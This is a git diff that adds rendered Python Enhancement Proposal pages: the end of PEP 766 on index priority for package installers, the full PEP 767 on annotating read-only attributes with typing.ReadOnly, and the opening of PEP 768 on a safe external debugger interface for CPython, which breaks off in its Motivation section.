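As a rough sketch of the difference between the two strategies, consider the following Python pseudocode. Here find_candidates and preference_key are hypothetical stand-ins for an installer’s real index-querying and ranking logic; they are not any installer’s actual API:

from typing import Callable, Sequence

def resolve_version_priority(indexes: Sequence[str], package: str,
                             find_candidates: Callable[[str, str], list[str]],
                             preference_key: Callable[[str], tuple]) -> str:
    # Version priority: collate candidates from every index into one
    # pool first, then pick the globally "best" match.
    pool = [c for url in indexes for c in find_candidates(url, package)]
    if not pool:
        raise LookupError(f"no viable candidates for {package!r}")
    return max(pool, key=preference_key)

def resolve_index_priority(indexes: Sequence[str], package: str,
                           find_candidates: Callable[[str, str], list[str]],
                           preference_key: Callable[[str], tuple]) -> str:
    # Index priority: every package starts over at the highest-priority
    # index; fall through only when an index has no viable candidate.
    for url in indexes:
        pool = find_candidates(url, package)
        if pool:
            # a "better" match on a later index is never considered
            return max(pool, key=preference_key)
    raise LookupError(f"no viable candidates for {package!r} on any index")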

+

One desirable behavior that the index priority strategy implies is that there are no “surprise” updates, where a version bump on a lower-priority index wins out over a curated, approved higher-priority index. This is related to the security improvement of PEP 708, where packages can restrict the external indexes that distributions can come from, but index priority is more configurable by end users. Package installs are only expected to change when either the higher-priority index or the index priority configuration changes. This stability and predictability make it more viable to configure indexes as a more persistent property of an environment, rather than a one-off argument for one install command.

+
+

Cache keys

+

Because index priority acknowledges the possibility that different indexes may have different content for a given package, caching and lockfiles should now include the index from which distributions were downloaded. Without this, it is possible that after changing the list of configured indexes, the cache or lockfile could provide a similarly-named distribution from a lower-priority index. If every index follows the recommended behavior of providing identical files across indexes for a given filename, this is not an issue. However, that recommendation is not readily enforceable, and augmenting the cache key with the origin index would be a wise defensive change.
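A small sketch of the suggested defensive change, with illustrative values only:

# Keying a download cache (or lockfile entry) by filename alone assumes
# every index serves identical bytes for a given filename:
old_key = "example_pkg-1.0.0-py3-none-any.whl"

# Augmenting the key with the origin index prevents a reconfigured index
# list from silently satisfying a request with a different artifact of
# the same name from a lower-priority index:
new_key = ("https://private.example/simple",
           "example_pkg-1.0.0-py3-none-any.whl")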

+
+
+

Ways that a request falls through to a lower priority index

+
    +
  • Package name is not present at all in higher priority index
  • +
  • All distributions from higher priority index filtered out due to +version specifier, compatible Python version, platform tag, yanking or otherwise
  • +
  • A denylist configuration for the installer specifies that a particular package +name should be ignored on a given index
  • +
  • A higher priority index is unreachable (e.g. blocked by firewall +rules, temporarily unavailable due to maintenance, other miscellaneous +and temporary networking issues). This is a less clear-cut detail that +should be controllable by users. On one hand, this behavior would lead +to less predictable, likely unreproducible results by unexpectedly +falling through to lower priority indexes. On the other hand, graceful +fallback may be more valuable to some users, especially if they can +safely assume that all of their indexes are equally trusted. pip’s +behavior today is graceful fallback: you see warnings if an index is +having connection issues, but the installation will proceed with any +other available indexes. Because index priority can convey different trust +levels between indexes, installers that implement index priority should +default to raising errors and aborting on network issues. Installers may +choose to provide a flag to allow fall-through to lower-priority indexes in +case of network error.
  • +
+

Treatment within a given index follows existing behavior, but stops at +the bounds of one index and moves on to the next index only after all +priority preferences within the one index are exhausted. This means that +existing priorities among the unified collection of packages apply to +each index individually before falling through to a lower priority +index.

+

There are tradeoffs to make at every level of the optimization criteria:

+
    +
  • version: index priority will use an older version from a higher-priority index +even if a newer version is available on another index.
  • +
  • wheel vs sdist: Should the installer use an sdist from a higher-priority +index before trying a wheel from a lower-priority index?
  • +
  • more platform-specific wheels before less specific ones: Should the +installer use less specific wheels from higher-priority indexes +before using more specific wheels from lower priority indexes?
  • +
  • flags such as pip’s --prefer-binary: Should the installer use an sdist from a higher +priority index before considering wheels on a lower priority index?
  • +
+

Installers are free to implement these priorities in different ways for +themselves, but they should document their optimization criteria and how they +handle fall-through to lower-priority indexes. For example, an installer could +say that --prefer-binary should not install an sdist unless it had iterated +through all configured indexes and found no installable binary candidates.

+
+
+

Mirroring

+

As described thus far, the index priority scheme breaks the use case of more +than one index url serving the same content. Such mirrors may be used with the +intent of ameliorating network issues or otherwise improving reliability. One +approach that installers could take to preserve mirroring functionality while +adding index priority would be to add a notion of user-definable index groups, +where each index in the group is assumed to be equivalent. This is related to +Poetry’s notion of package sources, except that this would allow +arbitrary numbers of prioritizable groups, and that this would assume members of +a group to be mirrors. Within each group, content could be combined, or each +member could be fetched concurrently. The fastest responding index would then +represent the group.

+
+
+
+
+

Backwards Compatibility

+

This PEP does not prescribe any changes as mandatory for any installer, +so it only introduces compatibility concerns if tools choose to adopt an +index behavior other than the behavior(s) they currently implement.

+

This PEP’s language does not quite align with existing tools, including pip and uv. Either this PEP’s language can change during review, or, if it is preferred as-is, other projects could conform to it. The only goal of proposing these terms is to create a central, common vocabulary that makes it easier for users to learn about other installers.

+

As some tools rely on one or the other behavior, there are some possible +issues that may emerge, where tailoring available resources/packages for +a particular behavior may detract from the user experience for people +who rely on the other behavior.

+
    +
  • Different indexes may have different metadata. For example, one cannot assume +that the metadata for package “something” on index “A” has the same dependencies +as “something” on index “B”. This breaks fundamental assumptions of version +priority, but index priority can handle this. When an installer falls through to a +lower-priority index in the search order, it implies refreshing the package metadata +from the new index. This is both an improvement and a complication. It is a +complication in the sense that a cached metadata entry must be keyed by both +package name and index url, instead of just package name. It is a potential +improvement in that different implementation variants of a package can differ in +dependencies as long as their distributions are separated into different indexes.
  • +
  • Users may not get updates as they expect when using index priority, because some higher priority +index has not updated/synchronized with PyPI to get the latest +packages. If the higher priority index has a valid candidate, newer +packages will not be found. This will need to be communicated +verbosely, because it is counter to pip’s well-established behavior.
  • +
  • By adding index priority, an installer will improve the predictability of +which index will be selected, and index hosts may abuse this as a way of having +similarly named files that have different contents. With version priority, +this violates the key package interchangeability assumption, and insanity will ensue. +Index priority would be more workable, but the situation still +has great potential for confusion. It would be helpful to develop tools that +support installers in identifying these confusing issues. These tools could +operate independently of the installer process, as a means of validating the +sanity of a set of indexes. Depending on the time cost of these tools, the +installers could run them as part of their process. Users could, of course, +ignore the recommendations at their own risk.
  • +
+
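The two-part cache key mentioned above might be sketched as follows, with fetch_metadata standing in for whatever a given installer uses to retrieve package metadata from one index:

_metadata_cache: dict[tuple[str, str], dict] = {}

def get_metadata(name: str, index_url: str) -> dict:
    # Key by (package name, index URL): "something" on index A may
    # declare different dependencies than "something" on index B.
    key = (name, index_url)
    if key not in _metadata_cache:
        _metadata_cache[key] = fetch_metadata(name, index_url)
    return _metadata_cache[key]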
+
+

Security Implications

+

Index priority creates a mechanism for users to explicitly specify a trust hierarchy among their indexes. As such, it limits the potential for dependency confusion attacks. Index priority was rejected by PEP 708 as a solution for dependency confusion attacks. This PEP requests that the rejection be reconsidered, with index priority serving a different purpose. This PEP is primarily motivated by the desire to support implementation variants, which is the subject of another discussion that will hopefully lead to a PEP. It is not mutually exclusive with PEP 708, nor does it suggest reverting or withdrawing PEP 708. It is an answer to how we could allow users to choose which index to use at a finer-grained level than “per install”.

+

For a more thorough discussion of the PEP 708 rejection of index +priority, please see the discuss.python.org thread for this PEP.

+
+
+

How to Teach This

+

At the outset, the goal is not to convert pip or any other tool to change its default priority behavior. The best way to teach is perhaps to watch message boards, GitHub issue trackers and chat channels, keeping an eye out for problems that index priority could help solve. There are several long-standing discussions that would be good places to start advertising the concepts. The topics of the two officially supported behaviors need documentation, and we, the authors of this PEP, would develop these as part of the review period of this PEP. These docs would likely consist of additions across several documentation sites, cross-linking the concepts between installers. At a minimum, we expect to add to the PyPUG and to pip’s documentation.

+

It will be important for installers to advertise the active behavior, especially in error messaging; that messaging is also an opportunity to point users to resources about these behaviors.

+

uv users are already experiencing index priority. uv documents this +behavior +well, but it is always possible to improve the +discoverability of that +documentation from the command line, where users will actually +encounter the unexpected +behavior.

+
+
+

Reference Implementation

+

The uv project demonstrates index priority with its default behavior. uv is implemented in Rust, though, so if a reference implementation in a Python-based tool is necessary, we, the authors of this PEP, will provide one. For pip in particular, we see the implementation plan as something like:

+
    +
  • For users who don’t use --extra-index-url or --find-links, +there will be no change, and no migration is necessary.
  • +
  • pip users would be able to opt in to the index priority behavior with a new config setting in the CLI and in pip.conf (see the sketch after this list). This proposal does not recommend any strategy as the default for any installer. It only recommends documenting the strategies that a tool provides.
  • +
  • Enable extra info-level output for any pip operation where more than one index is used. In this output, state the current strategy setting and a terse summary of implied behavior, as well as a link to docs that describe the different options.
  • +
  • Add debugging output that verbosely identifies the index being used at +each step, including where the file is in the configuration hierarchy, +and where it is being included (via config file, env var, or CLI +flag).
  • +
  • Plumb tracking of which index gets used for which package/distribution through the entire pip install process. Store this information so that it is available to tools like pip freeze.
  • +
  • Supplement PEP 751 (lockfiles) with capture of the index where a package/distribution came from.
  • +
+
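To make the opt-in concrete, a pip.conf entry might look like the sketch below. The option name index-strategy and its values are invented for illustration; nothing here is a committed pip interface:

# pip.conf (hypothetical)
[install]
# alternative value: version-priority
index-strategy = index-priority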
+
+

Rejected Ideas

+
    +
  • Tell users to set up a proxy/mirror, such as devpi +or Artifactory that +serves local files if present, and forwards to another server (PyPI) +if no local files match

    This matches the behavior of this proposal very closely, except that this method requires hosting some server, and may be inaccessible or not configurable by users in some environments. It is also important to consider that for an organization that operates its own index (for overcoming PyPI size restrictions, for example), this does not solve the need for --extra-index-url or a proxy/mirror for end users. That is, organizations get no improvement from this approach unless they proxy/mirror PyPI as a whole, and get users to configure their proxy/mirror as their sole index.

    +
  • +
  • Are build tags and/or local version specifiers enough?

    Build tags and local version specifiers will take precedence over packages without those tags and/or local version specifiers. In a pool of packages, builds that have these additions hosted on a server other than PyPI will take priority over packages on PyPI, where build tags are rarely used and local version specifiers are forbidden. This approach is viable when package providers want to provide their own local override, such as HPC maintainers who provide optimized builds for their users. It is less viable in some ways, such as build tags not showing up in pip freeze metadata, and local version specifiers not being allowed on PyPI. There is also significant work entailed in building and maintaining package collections with local build tag variants.

    +

    https://discuss.python.org/t/dependency-notation-including-the-index-url/5659/21

    +
  • +
  • What about PEP 708? Isn’t that +enough?

    PEP 708 is aimed specifically at addressing dependency confusion +attacks, and doesn’t address the potential for implementation variants +among indexes. It is a way of filtering external URLs and encoding an +allow-list for external indexes in index metadata. It does not change +the lack of priority or preference among channels that currently +exists.

    +
  • +
  • Namespacing

    Namespacing is a means of specifying a package such that the Python usage of the package does not change, but the package installation restricts where the package comes from. PEP 752 recently proposed a way to multiplex a package’s owners in a flat package namespace (e.g. PyPI) by reserving prefixes as grouping elements. NPM’s concept of “scopes” has been raised as another good example of how this might look. This PEP differs in that it is targeted at multiple indexes, not a flat package namespace. The net effect is roughly the same in terms of predictably choosing a particular package source, except that the namespacing approach relies more on naming packages with these namespace prefixes, whereas this PEP would be less granular, pulling in packages on whatever higher-priority index the user specifies. The namespacing approach relies on all configured indexes treating a given namespace similarly, which leaves the usual concern that not all configured indexes are trusted equally. The namespace idea is not incompatible with this PEP, but it also does not improve expression of trust of indexes in the way that this PEP does.

    +
  • +
+
+
+

Open Issues

+

[Any points that are still being decided/discussed.]

+
+
+

Acknowledgements

+

This work was supported financially by NVIDIA through employment of the author. +NVIDIA teammates dramatically improved this PEP with their +input. Astral Software pioneered the behaviors of index priority and thus laid the +foundation of this document. The pip authors deserve great praise for their +consistent direction and patient communication of the version priority behavior, +especially in the face of contentious security concerns.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0766.rst

+

Last modified: 2024-11-21 20:00:24 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0767/index.html b/pep-0767/index.html new file mode 100644 index 00000000000..ee76f32a804 --- /dev/null +++ b/pep-0767/index.html @@ -0,0 +1,777 @@ + + + + + + + + PEP 767 – Annotating Read-Only Attributes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 767 – Annotating Read-Only Attributes

+
+
Author:
+
Eneg <eneg at discuss.python.org>
+
Sponsor:
+
Carl Meyer <carl at oddbird.net>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
18-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
09-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 705 introduced the typing.ReadOnly type qualifier +to allow defining read-only typing.TypedDict items.

+

This PEP proposes using ReadOnly in annotations of class and protocol +attributes, as a single concise way to mark them read-only.

+

Akin to PEP 705, it makes no changes to setting attributes at runtime. Correct +usage of read-only attributes is intended to be enforced only by static type checkers.

+
+
+

Motivation

+

The Python type system lacks a single concise way to mark an attribute read-only. +This feature is present in other statically and gradually typed languages +(such as C# +or TypeScript), +and is useful for removing the ability to reassign or delete an attribute +at a type checker level, as well as defining a broad interface for structural subtyping.

+
+

Classes

+

Today, there are three major ways of achieving read-only attributes, honored by type checkers:

+
    +
  • annotating the attribute with typing.Final:
    class Foo:
    +    number: Final[int]
    +
    +    def __init__(self, number: int) -> None:
    +        self.number = number
    +
    +
    +class Bar:
    +    def __init__(self, number: int) -> None:
    +        self.number: Final = number
    +
    +
    +
      +
    • Supported by dataclasses (and type checkers since typing#1669).
    • +
    • Overriding number is not possible - the specification of Final specifies that the name cannot be overridden in subclasses.
    • +
    +
  • +
  • read-only proxy via @property:
    class Foo:
    +    _number: int
    +
    +    def __init__(self, number: int) -> None:
    +        self._number = number
    +
    +    @property
    +    def number(self) -> int:
    +        return self._number
    +
    +
    +
      +
    • Overriding number is possible. Type checkers disagree about the specific rules. [1]
    • +
    • Read-only at runtime. [2]
    • +
    • Requires extra boilerplate.
    • +
    • Supported by dataclasses, but does not compose well - the synthesized +__init__ and __repr__ will use _number as the parameter/attribute name.
    • +
    +
  • +
  • using a “freezing” mechanism, such as dataclasses.dataclass() or typing.NamedTuple:
    @dataclass(frozen=True)
    +class Foo:
    +    number: int  # implicitly read-only
    +
    +
    +class Bar(NamedTuple):
    +    number: int  # implicitly read-only
    +
    +
    +
      +
    • Overriding number is possible in the @dataclass case.
    • +
    • Read-only at runtime. [2]
    • +
    • No per-attribute control - these mechanisms apply to the whole class.
    • +
    • Frozen dataclasses incur some runtime overhead.
    • +
    • NamedTuple is still a tuple. Most classes do not need to inherit +indexing, iteration, or concatenation.
    • +
    +
  • +
+
+
+

Protocols

+

A read-only attribute name: T on a Protocol in principle +defines two requirements:

+
    +
  1. hasattr(obj, "name")
  2. +
  3. isinstance(obj.name, T)
  4. +
+

Those requirements are satisfiable at runtime by all of the following:

+
    +
  • an object with an attribute name: T,
  • +
  • a class with a class variable name: ClassVar[T],
  • +
  • an instance of the class above,
  • +
  • an object with a @property def name(self) -> T,
  • +
  • an object with a custom descriptor, such as functools.cached_property().
  • +
+

The current typing spec +allows creation of such protocol members using (abstract) properties:

+
class HasName(Protocol):
+    @property
+    def name(self) -> T: ...
+
+
+

This syntax has several drawbacks:

+
    +
  • It is somewhat verbose.
  • +
  • It is not obvious that the quality conveyed here is the read-only character of a property.
  • +
  • It is not composable with type qualifiers.
  • +
  • Not all type checkers agree [3] that all of the above five +objects are assignable to this structural type.
  • +
+
+
+
+

Rationale

+

These problems can be resolved by an attribute-level type qualifier. +ReadOnly has been chosen for this role, as its name conveys the intent well, +and the newly proposed changes complement its semantics defined in PEP 705.

+

A class with a read-only instance attribute can now be defined as:

+
from typing import ReadOnly
+
+
+class Member:
+    def __init__(self, id: int) -> None:
+        self.id: ReadOnly[int] = id
+
+
+

…and the protocol described in Protocols is now just:

+
from typing import Protocol, ReadOnly
+
+
+class HasName(Protocol):
+    name: ReadOnly[str]
+
+
+def greet(obj: HasName, /) -> str:
+    return f"Hello, {obj.name}!"
+
+
+
    +
  • A subclass of Member can redefine .id as a writable attribute or a +descriptor. It can also narrow the type.
  • +
  • The HasName protocol has a more succinct definition, and is agnostic +to the writability of the attribute.
  • +
  • The greet function can now accept a wide variety of compatible objects, +while being explicit about no modifications being done to the input.
  • +
+
+
+

Specification

+

The typing.ReadOnly type qualifier +becomes a valid annotation for attributes of classes and protocols. +It can be used at class-level or within __init__ to mark individual attributes read-only:

+
class Book:
+    id: ReadOnly[int]
+
+    def __init__(self, id: int, name: str) -> None:
+        self.id = id
+        self.name: ReadOnly[str] = name
+
+
+

Type checkers should error on any attempt to reassign or delete an attribute +annotated with ReadOnly. +Type checkers should also error on any attempt to delete an attribute annotated as Final. +(This is not currently specified.)

+

Use of ReadOnly in annotations at other sites where it currently has no meaning +(such as local/global variables or function parameters) is considered out of scope +for this PEP.

+

Akin to Final [4], ReadOnly does not influence how +type checkers perceive the mutability of the assigned object. Immutable ABCs +and containers may be used in combination with ReadOnly +to forbid mutation of such values at a type checker level:

+
from collections import abc
+from dataclasses import dataclass
+from typing import Protocol, ReadOnly
+
+
+@dataclass
+class Game:
+    name: str
+
+
+class HasGames[T: abc.Collection[Game]](Protocol):
+    games: ReadOnly[T]
+
+
+def add_games(shelf: HasGames[list[Game]]) -> None:
+    shelf.games.append(Game("Half-Life"))  # ok: list is mutable
+    shelf.games[-1].name = "Black Mesa"    # ok: "name" is not read-only
+    shelf.games = []                       # error: "games" is read-only
+    del shelf.games                        # error: "games" is read-only and cannot be deleted
+
+
+def read_games(shelf: HasGames[abc.Sequence[Game]]) -> None:
+    shelf.games.append(...)             # error: "Sequence" has no attribute "append"
+    shelf.games[0].name = "Blue Shift"  # ok: "name" is not read-only
+    shelf.games = []                    # error: "games" is read-only
+
+
+

All instance attributes of frozen dataclasses and NamedTuple are implicitly read-only. Type checkers may inform the user that annotating such attributes with ReadOnly is redundant, but it should not be seen as an error:

+
from dataclasses import dataclass
+from typing import NewType, ReadOnly
+
+
+@dataclass(frozen=True)
+class Point:
+    x: int            # implicit read-only
+    y: ReadOnly[int]  # ok, redundant
+
+
+uint = NewType("uint", int)
+
+
+@dataclass(frozen=True)
+class UnsignedPoint(Point):
+    x: ReadOnly[uint]  # ok, redundant; narrower type
+    y: Final[uint]     # not redundant, Final imposes extra restrictions; narrower type
+
+
+
+

Initialization

+

Assignment to a read-only attribute can only occur in the class declaring the attribute. There is no restriction on how many times the attribute can be assigned to. The assignment must be allowed in the following contexts:

+
    +
  • In __init__, on the instance received as the first parameter (likely, self).
  • +
  • In __new__, on instances of the declaring class created via a call +to a super-class’ __new__ method.
  • +
  • At declaration in the body of the class.
  • +
+

Additionally, a type checker may choose to allow the assignment:

+
    +
  • In __new__, on instances of the declaring class, without regard +to the origin of the instance. +(This choice trades soundness, as the instance may already be initialized, +for the simplicity of implementation.)
  • +
  • In @classmethods, on instances of the declaring class created via +a call to the class’ or super-class’ __new__ method.
  • +
+

Note that a child class cannot assign to any read-only attributes of a parent class +in any of the aforementioned contexts, unless the attribute is redeclared.

+
from collections import abc
+from typing import ReadOnly
+
+
+class Band:
+    name: str
+    songs: ReadOnly[list[str]]
+
+    def __init__(self, name: str, songs: abc.Iterable[str] | None = None) -> None:
+        self.name = name
+        self.songs = []
+
+        if songs is not None:
+            self.songs = list(songs)  # multiple assignments are fine
+
+    def clear(self) -> None:
+        # error: assignment to read-only "songs" outside initialization
+        self.songs = []
+
+
+band = Band(name="Bôa", songs=["Duvet"])
+band.name = "Python"           # ok: "name" is not read-only
+band.songs = []                # error: "songs" is read-only
+band.songs.append("Twilight")  # ok: list is mutable
+
+
+class SubBand(Band):
+    def __init__(self) -> None:
+        self.songs = []  # error: cannot assign to a read-only attribute of a base class
+
+
+
# a simplified immutable Fraction class
+class Fraction:
+    numerator: ReadOnly[int]
+    denominator: ReadOnly[int]
+
+    def __new__(
+        cls,
+        numerator: str | int | float | Decimal | Rational = 0,
+        denominator: int | Rational | None = None
+    ) -> Self:
+        self = super().__new__(cls)
+
+        if denominator is None:
+            if type(numerator) is int:
+                self.numerator = numerator
+                self.denominator = 1
+                return self
+
+            elif isinstance(numerator, Rational): ...
+
+        else: ...
+
+    @classmethod
+    def from_float(cls, f: float, /) -> Self:
+        self = super().__new__(cls)
+        self.numerator, self.denominator = f.as_integer_ratio()
+        return self
+
+
+

When a class-level declaration has an initializing value, it can serve as a flyweight +default for instances:

+
class Patient:
+    number: ReadOnly[int] = 0
+
+    def __init__(self, number: int | None = None) -> None:
+        if number is not None:
+            self.number = number
+
+
+
+

Note

+

This feature conflicts with __slots__. An attribute with +a class-level value cannot be included in slots, effectively making it a class variable.

+
+

Type checkers may choose to warn on read-only attributes which could be left uninitialized +after an instance is created (except in stubs, +protocols or ABCs):

+
class Patient:
+    id: ReadOnly[int]    # error: "id" is not initialized on all code paths
+    name: ReadOnly[str]  # error: "name" is never initialized
+
+    def __init__(self) -> None:
+        if random.random() > 0.5:
+            self.id = 123
+
+
+class HasName(Protocol):
+    name: ReadOnly[str]  # ok
+
+
+
+
+

Subtyping

+

Read-only attributes are covariant. This has a few subtyping implications. +Borrowing from PEP 705:

+
    +
  • Read-only attributes can be redeclared as writable attributes, descriptors +or class variables:
    @dataclass
    +class HasTitle:
    +    title: ReadOnly[str]
    +
    +
    +@dataclass
    +class Game(HasTitle):
    +    title: str
    +    year: int
    +
    +
    +game = Game(title="DOOM", year=1993)
    +game.year = 1994
    +game.title = "DOOM II"  # ok: attribute is not read-only
    +
    +
    +class TitleProxy(HasTitle):
    +    @functools.cached_property
    +    def title(self) -> str: ...
    +
    +
    +class SharedTitle(HasTitle):
    +    title: ClassVar[str] = "Still Grey"
    +
    +
    +
  • +
  • If a read-only attribute is not redeclared, it remains read-only:
    class Game(HasTitle):
    +    year: int
    +
    +    def __init__(self, title: str, year: int) -> None:
    +        super().__init__(title)
    +        self.title = title  # error: cannot assign to a read-only attribute of base class
    +        self.year = year
    +
    +
    +game = Game(title="Robot Wants Kitty", year=2010)
    +game.title = "Robot Wants Puppy"  # error: "title" is read-only
    +
    +
    +
  • +
  • Subtypes can narrow the type of read-only attributes:
    class GameCollection(Protocol):
    +    games: ReadOnly[abc.Collection[Game]]
    +
    +
    +@dataclass
    +class GameSeries(GameCollection):
    +    name: str
    +    games: ReadOnly[list[Game]]  # ok: list[Game] is assignable to Collection[Game]
    +
    +
    +
  • +
  • Nominal subclasses of protocols and ABCs should redeclare read-only attributes +in order to implement them, unless the base class initializes them in some way:
    class MyBase(abc.ABC):
    +    foo: ReadOnly[int]
    +    bar: ReadOnly[str] = "abc"
    +    baz: ReadOnly[float]
    +
    +    def __init__(self, baz: float) -> None:
    +        self.baz = baz
    +
    +    @abstractmethod
    +    def pprint(self) -> None: ...
    +
    +
    +@final
    +class MySubclass(MyBase):
    +    # error: MySubclass does not override "foo"
    +
    +    def pprint(self) -> None:
    +        print(self.foo, self.bar, self.baz)
    +
    +
    +
  • +
  • In a protocol attribute declaration, name: ReadOnly[T] indicates that a structural +subtype must support .name access, and the returned value is assignable to T:
    class HasName(Protocol):
    +    name: ReadOnly[str]
    +
    +
    +class NamedAttr:
    +    name: str
    +
    +class NamedProp:
    +    @property
    +    def name(self) -> str: ...
    +
    +class NamedClassVar:
    +    name: ClassVar[str]
    +
    +class NamedDescriptor:
    +    @cached_property
    +    def name(self) -> str: ...
    +
    +# all of the following are ok
    +has_name: HasName
    +has_name = NamedAttr()
    +has_name = NamedProp()
    +has_name = NamedClassVar
    +has_name = NamedClassVar()
    +has_name = NamedDescriptor()
    +
    +
    +
  • +
+
+
+

Interaction with Other Type Qualifiers

+

ReadOnly can be used with ClassVar and Annotated in any nesting order:

+
class Foo:
+    foo: ClassVar[ReadOnly[str]] = "foo"
+    bar: Annotated[ReadOnly[int], Gt(0)]
+
+
+
class Foo:
+    foo: ReadOnly[ClassVar[str]] = "foo"
+    bar: ReadOnly[Annotated[int, Gt(0)]]
+
+
+

This is consistent with the interaction of ReadOnly and typing.TypedDict +defined in PEP 705.

+

An attribute annotated as both ReadOnly and ClassVar can only be assigned to +at declaration in the class body.

+

An attribute cannot be annotated as both ReadOnly and Final, as the two +qualifiers differ in semantics, and Final is generally more restrictive. +Final remains allowed as an annotation of attributes that are only implied +to be read-only. It can be also used to redeclare a ReadOnly attribute of a base class.
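For illustration, the following sketch (with invented class names) shows how these rules might surface; a type checker following this PEP would accept the Final redeclaration but reject the combined qualifier:

from typing import Final, ReadOnly


class Entry:
    id: ReadOnly[int]

    def __init__(self, id: int) -> None:
        self.id = id


class PinnedEntry(Entry):
    id: Final[int]  # ok: Final may redeclare a ReadOnly attribute of a base class

    def __init__(self) -> None:
        self.id = 0


class Broken:
    x: ReadOnly[Final[int]]  # error: ReadOnly and Final cannot be combined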

+
+
+
+

Backwards Compatibility

+

This PEP introduces new contexts where ReadOnly is valid. Programs inspecting +those places will have to change to support it. This is expected to mainly affect type checkers.

+

However, caution is advised while using the backported typing_extensions.ReadOnly +in older versions of Python. Mechanisms inspecting annotations may behave incorrectly +when encountering ReadOnly; in particular, the @dataclass decorator +which looks for +ClassVar may mistakenly treat ReadOnly[ClassVar[...]] as an instance attribute.

+

To avoid issues with introspection, use ClassVar[ReadOnly[...]] instead of ReadOnly[ClassVar[...]].

+
+
+

Security Implications

+

There are no known security consequences arising from this PEP.

+
+
+

How to Teach This

+

Suggested changes to the typing module documentation, +following the footsteps of PEP 705:

+
    +
  • Add this PEP to the others listed.
  • +
  • Link typing.ReadOnly to this PEP.
  • +
  • Update the description of typing.ReadOnly:
    +
    A special typing construct to mark an attribute of a class or an item of +a TypedDict as read-only.
    +
  • +
  • Add a standalone entry for ReadOnly under the +type qualifiers section:
    +
    The ReadOnly type qualifier in class attribute annotations indicates +that the attribute of the class may be read, but not reassigned or deleted. +For usage in TypedDict, see ReadOnly.
    +
  • +
+
+
+

Rejected Ideas

+
+

Clarifying Interaction of @property and Protocols

+

The Protocols section mentions an inconsistency between type checkers in +the interpretation of properties in protocols. The problem could be fixed +by amending the typing specification, clarifying what implements the read-only +quality of such properties.

+

This PEP makes ReadOnly a better alternative for defining read-only attributes +in protocols, superseding the use of properties for this purpose.

+
+
+

Assignment Only in __init__ and Class Body

+

An earlier version of this PEP proposed that read-only attributes could only be +assigned to in __init__ and the class’ body. A later discussion revealed that +this restriction would severely limit the usability of ReadOnly within +immutable classes, which typically do not define __init__.

+

fractions.Fraction is one example of an immutable class, where the +initialization of its attributes happens within __new__ and classmethods. +However, unlike in __init__, the assignment in __new__ and classmethods +is potentially unsound, as the instance they work on can be sourced from +an arbitrary place, including an already finalized instance.

+

We find it imperative that this type checking feature is useful to the foremost +use site of read-only attributes - immutable classes. Thus, the PEP has changed +since to allow assignment in __new__ and classmethods under a set of rules +described in the Initialization section.

+
+
+
+

Open Issues

+
+

Extending Initialization

+

Mechanisms such as dataclasses.__post_init__() or attrs’ initialization hooks +augment object creation by providing a set of special hooks which are called +during initialization.

+

The current initialization rules defined in this PEP disallow assignment to read-only attributes in such methods. It is unclear whether the rules could be shaped satisfactorily to include those 3rd party hooks while upholding the invariants associated with the read-only nature of those attributes.

+

The Python type system has a long and detailed specification regarding the behavior of __new__ and __init__. It is infeasible to expect the same level of detail from 3rd party hooks.

+

A potential solution would involve type checkers providing configuration in this +regard, requiring end users to manually specify a set of methods they wish +to allow initialization in. This however could easily result in users mistakenly +or purposefully breaking the aforementioned invariants. It is also a fairly +big ask for a relatively niche feature.

+
+
+

ReadOnly[ClassVar[...]] and __init_subclass__

+

Should read-only class variables be assignable to within the declaring class’ +__init_subclass__?

+
class URI:
+    protocol: ReadOnly[ClassVar[str]] = ""
+
+    def __init_subclass__(cls, protocol: str = "") -> None:
+        cls.protocol = protocol
+
+class File(URI, protocol="file"): ...
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0767.rst

+

Last modified: 2024-12-05 19:37:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0768/index.html b/pep-0768/index.html new file mode 100644 index 00000000000..32035ceb4c2 --- /dev/null +++ b/pep-0768/index.html @@ -0,0 +1,575 @@ + + + + + + + + PEP 768 – Safe external debugger interface for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 768 – Safe external debugger interface for CPython

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>, Matt Wozniski <godlygeek at gmail.com>, Ivona Stojanovic <stojanovic.i at hotmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
25-Nov-2024
+
Python-Version:
+
3.14
+
Post-History:
+
11-Dec-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a zero-overhead debugging interface to CPython that +allows debuggers and profilers to safely attach to running Python processes. The +interface provides safe execution points for attaching debugger code without +modifying the interpreter’s normal execution path or adding runtime overhead.

+

A key application of this interface will be enabling pdb to attach to live +processes by process ID, similar to gdb -p, allowing developers to inspect and +debug Python applications interactively in real-time without stopping or +restarting them.

+
+
+

Motivation

+

Debugging Python processes in production and live environments presents unique +challenges. Developers often need to analyze application behavior without +stopping or restarting services, which is especially crucial for +high-availability systems. Common scenarios include diagnosing deadlocks, +inspecting memory usage, or investigating unexpected behavior in real-time.

+

Very few Python tools can attach to running processes, primarily because doing +so requires deep expertise in both operating system debugging interfaces and +CPython internals. While C/C++ debuggers like GDB and LLDB can attach to +processes using well-understood techniques, Python tools must implement all of +these low-level mechanisms plus handle additional complexity. For example, when +GDB needs to execute code in a target process, it:

+
    +
  1. Uses ptrace to allocate a small chunk of executable memory (easier said than done)
  2. +
  3. Writes a small sequence of machine code - typically a function prologue, the +desired instructions, and code to restore registers
  4. +
  5. Saves all the target thread’s registers
  6. +
  7. Changes the instruction pointer to the injected code
  8. +
  9. Lets the process run until it hits a breakpoint at the end of the injected code
  10. +
